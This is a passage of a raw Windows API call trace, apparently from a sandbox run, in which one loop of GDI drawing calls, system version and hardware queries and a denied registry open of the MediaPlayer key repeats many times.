hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.857] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.857] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.857] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.857] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.857] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.857] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.857] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.857] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe60401d9 [0089.857] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe40401dc [0089.857] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045752 [0089.857] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045753 [0089.857] CombineRgn (hrgnDst=0x1045752, hrgnSrc1=0xe60401d9, hrgnSrc2=0xe40401dc, iMode=1) returned 1 [0089.857] CombineRgn (hrgnDst=0x1045753, hrgnSrc1=0xe60401d9, hrgnSrc2=0xe40401dc, iMode=4) returned 2 [0089.857] CreateSolidBrush (color=0xff) returned 0x2105751 [0089.857] CreateSolidBrush (color=0xff0000) returned 0x1105754 [0089.857] DeleteObject (ho=0x1105754) returned 1 [0089.857] DeleteObject (ho=0xe40401dc) returned 1 [0089.857] DeleteObject (ho=0xe60401d9) returned 1 [0089.857] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.858] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.858] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.858] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.858] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.858] BeginPath (hdc=0x0) returned 0 [0089.858] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.858] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.858] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.858] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.858] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.858] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.858] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.858] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.858] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe50401dc [0089.858] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe70401d9 [0089.858] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045755 [0089.858] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045756 [0089.859] CombineRgn (hrgnDst=0x1045755, hrgnSrc1=0xe50401dc, hrgnSrc2=0xe70401d9, iMode=1) returned 1 [0089.859] CombineRgn (hrgnDst=0x1045756, hrgnSrc1=0xe50401dc, hrgnSrc2=0xe70401d9, iMode=4) returned 2 [0089.859] CreateSolidBrush (color=0xff) returned 0x2105754 [0089.859] CreateSolidBrush (color=0xff0000) returned 0x1105757 [0089.859] DeleteObject (ho=0x1105757) returned 1 [0089.859] DeleteObject (ho=0xe70401d9) returned 1 [0089.859] DeleteObject (ho=0xe50401dc) returned 1 [0089.859] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.859] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.859] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.859] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.859] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.859] BeginPath (hdc=0x0) returned 0 [0089.859] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.859] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.859] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.859] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.859] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.859] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.859] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.859] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.860] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe80401d9 [0089.860] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe60401dc [0089.860] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045758 [0089.860] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045759 [0089.860] CombineRgn (hrgnDst=0x1045758, hrgnSrc1=0xe80401d9, hrgnSrc2=0xe60401dc, iMode=1) returned 1 [0089.860] CombineRgn (hrgnDst=0x1045759, hrgnSrc1=0xe80401d9, hrgnSrc2=0xe60401dc, iMode=4) returned 2 [0089.860] CreateSolidBrush (color=0xff) returned 0x2105757 [0089.860] CreateSolidBrush (color=0xff0000) returned 0x110575a [0089.860] DeleteObject (ho=0x110575a) returned 1 [0089.860] DeleteObject (ho=0xe60401dc) returned 1 [0089.860] DeleteObject (ho=0xe80401d9) returned 1 [0089.860] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.860] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.860] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.860] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.860] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.860] BeginPath (hdc=0x0) returned 0 [0089.860] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.860] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.860] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.861] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.861] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.861] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.861] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.861] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe70401dc [0089.861] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe90401d9 [0089.861] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104575b [0089.861] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104575c [0089.861] CombineRgn (hrgnDst=0x104575b, hrgnSrc1=0xe70401dc, hrgnSrc2=0xe90401d9, iMode=1) returned 1 [0089.861] CombineRgn (hrgnDst=0x104575c, hrgnSrc1=0xe70401dc, hrgnSrc2=0xe90401d9, iMode=4) returned 2 [0089.861] CreateSolidBrush (color=0xff) returned 0x210575a [0089.861] CreateSolidBrush (color=0xff0000) returned 0x110575d [0089.861] DeleteObject (ho=0x110575d) returned 1 [0089.861] DeleteObject (ho=0xe90401d9) returned 1 [0089.861] DeleteObject (ho=0xe70401dc) returned 1 [0089.861] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.861] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.862] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.862] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.862] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.862] BeginPath (hdc=0x0) returned 0 [0089.862] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.862] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.862] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.862] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.862] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.862] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.862] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.862] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.862] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xea0401d9 [0089.862] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xe80401dc [0089.862] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104575e [0089.862] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104575f [0089.862] CombineRgn (hrgnDst=0x104575e, hrgnSrc1=0xea0401d9, hrgnSrc2=0xe80401dc, iMode=1) returned 1 [0089.862] CombineRgn (hrgnDst=0x104575f, hrgnSrc1=0xea0401d9, hrgnSrc2=0xe80401dc, iMode=4) returned 2 [0089.862] CreateSolidBrush (color=0xff) returned 0x210575d [0089.863] CreateSolidBrush (color=0xff0000) returned 0x1105760 [0089.863] DeleteObject (ho=0x1105760) returned 1 [0089.863] DeleteObject (ho=0xe80401dc) returned 1 [0089.863] DeleteObject (ho=0xea0401d9) returned 1 [0089.863] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.863] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.863] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.863] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.863] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.863] BeginPath (hdc=0x0) returned 0 [0089.863] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.863] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.863] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.863] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.863] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.863] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.863] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.863] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xe90401dc [0089.864] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xeb0401d9 [0089.864] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045761 [0089.864] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045762 [0089.864] CombineRgn (hrgnDst=0x1045761, hrgnSrc1=0xe90401dc, hrgnSrc2=0xeb0401d9, iMode=1) returned 1 [0089.864] CombineRgn (hrgnDst=0x1045762, hrgnSrc1=0xe90401dc, hrgnSrc2=0xeb0401d9, iMode=4) returned 2 [0089.864] CreateSolidBrush (color=0xff) returned 0x2105760 [0089.864] CreateSolidBrush (color=0xff0000) returned 0x1105763 [0089.864] DeleteObject (ho=0x1105763) returned 1 [0089.864] DeleteObject (ho=0xeb0401d9) returned 1 [0089.864] DeleteObject (ho=0xe90401dc) returned 1 [0089.864] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.864] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.864] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.864] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.864] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.864] BeginPath (hdc=0x0) returned 0 [0089.864] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.864] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.864] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.864] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.864] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.864] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.864] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.865] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.865] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xec0401d9 [0089.865] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xea0401dc [0089.865] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045764 [0089.865] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045765 [0089.865] CombineRgn (hrgnDst=0x1045764, hrgnSrc1=0xec0401d9, hrgnSrc2=0xea0401dc, iMode=1) returned 1 [0089.865] CombineRgn (hrgnDst=0x1045765, hrgnSrc1=0xec0401d9, hrgnSrc2=0xea0401dc, iMode=4) returned 2 [0089.865] CreateSolidBrush (color=0xff) returned 0x2105763 [0089.865] CreateSolidBrush (color=0xff0000) returned 0x1105766 [0089.865] DeleteObject (ho=0x1105766) returned 1 [0089.865] DeleteObject (ho=0xea0401dc) returned 1 [0089.865] DeleteObject (ho=0xec0401d9) returned 1 [0089.865] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.865] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.865] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.865] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.866] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.866] BeginPath (hdc=0x0) returned 0 [0089.866] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.866] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.866] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.866] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.866] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.866] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.866] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.866] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.866] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xeb0401dc [0089.866] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xed0401d9 [0089.866] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045767 [0089.866] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1045768 [0089.866] CombineRgn (hrgnDst=0x1045767, hrgnSrc1=0xeb0401dc, hrgnSrc2=0xed0401d9, iMode=1) returned 1 [0089.866] CombineRgn (hrgnDst=0x1045768, hrgnSrc1=0xeb0401dc, hrgnSrc2=0xed0401d9, iMode=4) returned 2 [0089.866] CreateSolidBrush (color=0xff) returned 0x2105766 [0089.866] CreateSolidBrush (color=0xff0000) returned 0x1105769 [0089.866] DeleteObject (ho=0x1105769) returned 1 [0089.866] DeleteObject (ho=0xed0401d9) returned 1 [0089.866] DeleteObject (ho=0xeb0401dc) returned 1 [0089.866] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.867] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.867] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.867] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.867] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.867] BeginPath (hdc=0x0) returned 0 [0089.867] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.867] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.867] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.867] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.867] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.867] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.867] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.867] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.867] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xee0401d9 [0089.867] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xec0401dc [0089.867] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104576a [0089.867] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x104576b [0089.868] CombineRgn (hrgnDst=0x104576a, hrgnSrc1=0xee0401d9, hrgnSrc2=0xec0401dc, iMode=1) returned 1 [0089.868] CombineRgn (hrgnDst=0x104576b, hrgnSrc1=0xee0401d9, hrgnSrc2=0xec0401dc, iMode=4) returned 2 [0089.868] CreateSolidBrush (color=0xff) returned 0x2105769 [0089.868] CreateSolidBrush (color=0xff0000) returned 0x110576c [0089.868] DeleteObject (ho=0x110576c) returned 1 [0089.868] DeleteObject (ho=0xec0401dc) returned 1 [0089.868] DeleteObject (ho=0xee0401d9) returned 1 [0089.868] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0089.868] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0089.868] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.868] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0089.868] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0089.868] BeginPath (hdc=0x0) returned 0 [0089.868] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0089.868] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0089.868] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0089.868] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0089.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0089.868] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0089.868] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0089.868] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0089.869] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xed0401dc [0089.869] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xef0401d9 [0089.869] CreateRectRgn (x1=0, y1=0, 